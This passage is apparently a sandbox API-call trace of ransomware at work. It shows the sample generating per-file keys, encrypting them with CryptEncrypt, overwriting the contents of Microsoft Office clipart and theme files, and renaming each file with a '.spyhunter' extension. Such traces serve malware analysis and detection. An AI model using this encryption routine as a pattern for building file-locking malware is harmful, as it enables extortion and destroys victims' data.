lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb3c*=0x30, lpOverlapped=0x0) returned 1 [0098.596] CloseHandle (hObject=0x16c) returned 1 [0098.640] GetProcessHeap () returned 0x2c0000 [0098.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c8e1f8 [0098.641] wnsprintfW (in: pszDest=0x2c8e1f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF.spyhunter") returned 77 [0098.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187883.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187883.wmf.spyhunter")) returned 1 [0098.674] GetProcessHeap () returned 0x2c0000 [0098.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8e1f8 | out: hHeap=0x2c0000) returned 1 [0098.674] GetProcessHeap () returned 0x2c0000 [0098.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.675] GetProcessHeap () returned 0x2c0000 [0098.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x391670 | out: hHeap=0x2c0000) returned 1 [0098.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb78 | out: pbBuffer=0x57fb78) returned 1 [0098.675] GetProcessHeap () returned 0x2c0000 [0098.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb70*=0x30) returned 1 [0098.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00942_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0098.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF") returned 67 [0098.818] StrStrW (lpFirst="SO00942_.WMF", lpSrch=".txt") returned 0x0 [0098.818] GetProcessHeap () returned 0x2c0000 [0098.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.818] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb34*=0x1264, lpOverlapped=0x0) returned 1 [0098.860] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffed9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.860] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1264, lpNumberOfBytesWritten=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb34*=0x1264, lpOverlapped=0x0) returned 1 [0098.860] GetProcessHeap () returned 0x2c0000 [0098.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.860] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.860] WriteFile (in: hFile=0x154, lpBuffer=0x57fb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x57fb74*, lpNumberOfBytesWritten=0x57fb34*=0x4, lpOverlapped=0x0) returned 1 [0098.861] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb34*=0x30, lpOverlapped=0x0) returned 1 [0098.861] CloseHandle (hObject=0x154) returned 1 [0098.868] GetProcessHeap () returned 0x2c0000 [0098.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0098.868] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF.spyhunter") returned 77 [0098.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00942_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00942_.wmf.spyhunter")) returned 1 [0098.869] GetProcessHeap () returned 0x2c0000 [0098.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0098.869] GetProcessHeap () returned 0x2c0000 [0098.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.869] GetProcessHeap () returned 0x2c0000 [0098.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cae920 | out: hHeap=0x2c0000) returned 1 [0098.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb78 | out: pbBuffer=0x57fb78) returned 1 [0098.869] GetProcessHeap () returned 0x2c0000 [0098.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb70*=0x30) returned 1 [0098.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0098.870] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF") returned 64 [0098.870] StrStrW (lpFirst="WING1.WMF", lpSrch=".txt") returned 0x0 [0098.870] GetProcessHeap () returned 0x2c0000 [0098.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.870] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb34*=0xa16, lpOverlapped=0x0) returned 1 [0098.893] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff5ea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.893] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa16, lpNumberOfBytesWritten=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb34*=0xa16, lpOverlapped=0x0) returned 1 [0098.893] GetProcessHeap () returned 0x2c0000 [0098.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.893] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.893] WriteFile (in: hFile=0x154, lpBuffer=0x57fb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x57fb74*, lpNumberOfBytesWritten=0x57fb34*=0x4, lpOverlapped=0x0) returned 1 [0098.893] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb34*=0x30, lpOverlapped=0x0) returned 1 [0098.893] CloseHandle (hObject=0x154) returned 1 [0098.898] GetProcessHeap () returned 0x2c0000 [0098.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0098.898] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF.spyhunter") returned 74 [0098.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing1.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing1.wmf.spyhunter")) returned 1 [0098.899] GetProcessHeap () returned 0x2c0000 [0098.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0098.899] GetProcessHeap () returned 0x2c0000 [0098.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.899] GetProcessHeap () returned 0x2c0000 [0098.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8e890 | out: hHeap=0x2c0000) returned 1 [0098.899] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb70 | out: pbBuffer=0x57fb70) returned 1 [0098.899] GetProcessHeap () returned 0x2c0000 [0098.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.899] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb68*=0x30) returned 1 [0098.899] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0098.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF") returned 65 [0098.900] StrStrW (lpFirst="WHIRL1.WMF", lpSrch=".txt") returned 0x0 [0098.900] GetProcessHeap () returned 0x2c0000 [0098.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.900] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb2c*=0xa16, lpOverlapped=0x0) returned 1 [0098.948] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff5ea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.948] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa16, lpNumberOfBytesWritten=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb2c*=0xa16, lpOverlapped=0x0) returned 1 [0098.948] GetProcessHeap () returned 0x2c0000 [0098.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.948] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.948] WriteFile (in: hFile=0x154, lpBuffer=0x57fb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x57fb6c*, lpNumberOfBytesWritten=0x57fb2c*=0x4, lpOverlapped=0x0) returned 1 [0098.949] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb2c*=0x30, lpOverlapped=0x0) returned 1 [0098.949] CloseHandle (hObject=0x154) returned 1 [0098.949] GetProcessHeap () returned 0x2c0000 [0098.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0098.949] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF.spyhunter") returned 75 [0098.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl1.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl1.wmf.spyhunter")) returned 1 [0098.949] GetProcessHeap () returned 0x2c0000 [0098.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0098.949] GetProcessHeap () returned 0x2c0000 [0098.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.949] GetProcessHeap () returned 0x2c0000 [0098.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8e6f0 | out: hHeap=0x2c0000) returned 1 [0098.950] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb70 | out: pbBuffer=0x57fb70) returned 1 [0098.950] GetProcessHeap () returned 0x2c0000 [0098.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.950] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb68*=0x30) returned 1 [0098.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02201_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0099.079] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF") returned 80 [0099.079] StrStrW (lpFirst="WB02201_.GIF", lpSrch=".txt") returned 0x0 [0099.079] GetProcessHeap () returned 0x2c0000 [0099.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0099.079] ReadFile (in: hFile=0x174, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb2c*=0x1653, lpOverlapped=0x0) returned 1 [0099.141] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffe9ad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.141] WriteFile (in: hFile=0x174, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1653, lpNumberOfBytesWritten=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb2c*=0x1653, lpOverlapped=0x0) returned 1 [0099.141] GetProcessHeap () returned 0x2c0000 [0099.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0099.141] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.141] WriteFile (in: hFile=0x174, lpBuffer=0x57fb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x57fb6c*, lpNumberOfBytesWritten=0x57fb2c*=0x4, lpOverlapped=0x0) returned 1 [0099.141] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb2c*=0x30, lpOverlapped=0x0) returned 1 [0099.141] CloseHandle (hObject=0x174) returned 1 [0099.141] GetProcessHeap () returned 0x2c0000 [0099.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.142] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF.spyhunter") returned 90 [0099.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02201_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02201_.gif.spyhunter")) returned 1 [0099.142] GetProcessHeap () returned 0x2c0000 [0099.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.142] GetProcessHeap () returned 0x2c0000 [0099.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0099.142] GetProcessHeap () returned 0x2c0000 [0099.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x352d58 | out: hHeap=0x2c0000) returned 1 [0099.142] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb68 | out: pbBuffer=0x57fb68) returned 1 [0099.142] GetProcessHeap () returned 0x2c0000 [0099.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0099.143] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb60*=0x30) returned 1 [0099.143] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02106_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0099.143] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF") returned 80 [0099.143] StrStrW (lpFirst="WB02106_.GIF", lpSrch=".txt") returned 0x0 [0099.143] GetProcessHeap () returned 0x2c0000 [0099.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0099.143] ReadFile (in: hFile=0x174, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb24*=0x15fa, lpOverlapped=0x0) returned 1 [0099.246] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffea06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.247] WriteFile (in: hFile=0x174, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15fa, lpNumberOfBytesWritten=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb24*=0x15fa, lpOverlapped=0x0) returned 1 [0099.247] GetProcessHeap () returned 0x2c0000 [0099.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0099.247] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.247] WriteFile (in: hFile=0x174, lpBuffer=0x57fb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x57fb64*, lpNumberOfBytesWritten=0x57fb24*=0x4, lpOverlapped=0x0) returned 1 [0099.247] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb24*=0x30, lpOverlapped=0x0) returned 1 [0099.247] CloseHandle (hObject=0x174) returned 1 [0099.247] GetProcessHeap () returned 0x2c0000 [0099.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.247] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF.spyhunter") returned 90 [0099.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02106_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02106_.gif.spyhunter")) returned 1 [0099.248] GetProcessHeap () returned 0x2c0000 [0099.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.248] GetProcessHeap () returned 0x2c0000 [0099.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0099.248] GetProcessHeap () returned 0x2c0000 [0099.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3528a8 | out: hHeap=0x2c0000) returned 1 [0099.248] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb68 | out: pbBuffer=0x57fb68) returned 1 [0099.248] GetProcessHeap () returned 0x2c0000 [0099.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0099.248] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb60*=0x30) returned 1 [0099.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\technic.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0099.780] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx") returned 69 [0099.780] StrStrW (lpFirst="Technic.thmx", lpSrch=".txt") returned 0x0 [0099.780] GetProcessHeap () returned 0x2c0000 [0099.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0099.780] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fb24*=0x2800, lpOverlapped=0x0) returned 1 [0099.851] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.851] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fb24*=0x2800, lpOverlapped=0x0) returned 1 [0099.851] GetProcessHeap () returned 0x2c0000 [0099.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0099.851] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.851] WriteFile (in: hFile=0xb4, lpBuffer=0x57fb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x57fb64*, lpNumberOfBytesWritten=0x57fb24*=0x4, lpOverlapped=0x0) returned 1 [0100.218] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb24*=0x30, lpOverlapped=0x0) returned 1 [0100.218] CloseHandle (hObject=0xb4) returned 1 [0100.218] GetProcessHeap () returned 0x2c0000 [0100.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0100.218] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx.spyhunter") returned 79 [0100.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\technic.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\technic.thmx.spyhunter")) returned 1 [0100.219] GetProcessHeap () returned 0x2c0000 [0100.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0100.219] GetProcessHeap () returned 0x2c0000 [0100.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0100.219] GetProcessHeap () returned 0x2c0000 [0100.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16b30 | out: hHeap=0x2c0000) returned 1 [0100.219] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb60 | out: pbBuffer=0x57fb60) returned 1 [0100.219] GetProcessHeap () returned 0x2c0000 [0100.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0100.219] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, 